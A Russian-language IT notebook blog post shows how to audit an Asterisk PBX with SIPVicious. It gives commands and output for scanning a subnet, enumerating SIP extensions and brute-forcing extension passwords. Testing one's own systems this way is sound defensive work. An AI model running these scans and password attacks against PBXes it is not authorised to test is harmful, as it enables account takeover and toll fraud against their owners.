Всем IT-шникам на заметку...

По роду своей работы в сфере IT мне достаточно часто приходится сталкиваться с проблемами не всегда стандартными для IT сферы. Так же заметки со ссылками на статьи которые очень часто на практике выручали, держать на своем компе стало не удобно. По этой причине создан этот блог - записная книжка статей и заметок. Авторов статей прошу не обижаться если местами забыл сделать на них обратную ссылку. Пишите в комментариях все обязательно поправлю..

Безопастность Asteris

Не буду рассказывать, как вы должны защищаться от хитрожопых хацкеров, просто посмотрим как можно проверить свой asterisk на дыры.

Итак есть чудный набор скриптов для этих экспериментов. Называется SIPVicious.

Для того чтобы найти уязвимые акки используются утилиты из пакета SIPVicious: каждая из них работает в консоли и может запускать как под виндой, так и линухом. На фряхе 8,0 не захотела работать:)

Для этого сначала просканируем заданную подсеть (скажем, это будет 192.168.1.1/24), чтобы найти BPX:

[you@box sipvicious]$ ./svmap 192.168.1.1/24

| SIP Device | User Agent |

-------------------------------------

| 192.168.1.103:5060 | Asterisk PBX |

[you@box sipvicious]$

Таким образом, мы нашли нашу АТС-ку. Далее необходимо провести ее анализ и отыскать extention’s:

[you@box sipvicious]$ ./svwar.py 192.168.1.103

| Extension | Authentication |

------------------------------

| 123 | reqauth |

| 100 | reqauth |

| 101 | noauth |

[you@box sipvicious]$

И хотя результат для нас вряд ли можно назвать неожиданным, мы видим, что номер 101 не требует авторизации. А для 100 и 123 требуется ввести пароль. Попробуем подобрать его для 100, используя подбор по числовым значениям (а они используются более чем часто):

[you@box sipvicious]$ ./svcrack.py 192.168.1.103 -u 100

| Extension | Password |

------------------------

| 100 | 100 |

Пароль подобран! Теперь попробуем взломать пасс для аккаунта 123, используя словарик:

[you@box sipvicious]$ ./svcrack.py 192.168.1.103 -u 123 -d dictionary.txt

| Extension | Password |

------------------------

| 123 | secret |

Пассы найдены: осталось подставить найденные логин-пароль в свой SIP клиент и проверить их в действии. Конечно, вероятность успешного брутфорса на отдельно взятый аккаунт невелика. Но среди сотен extentionов всегда найдется хотя бы один со слабым паролем. Более того, подход “обнаружить bpx, найти extention, подобрать пароль” является одной из самых простых на VoIP.

Сам игрался этой штукой давненько, накатал сюда чисто, что бы не забыть. Никоим образом не несу ответственности за чьи то взломанные PBX. Пост написан для проверки себя на дыры и в ознакомительных целях. Всем удачной защиты)

Источник <http://unixway.info/sip/%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D1%82%D0%BD%D0%BE%D1%81%D1%82%D1%8C-asterisk/>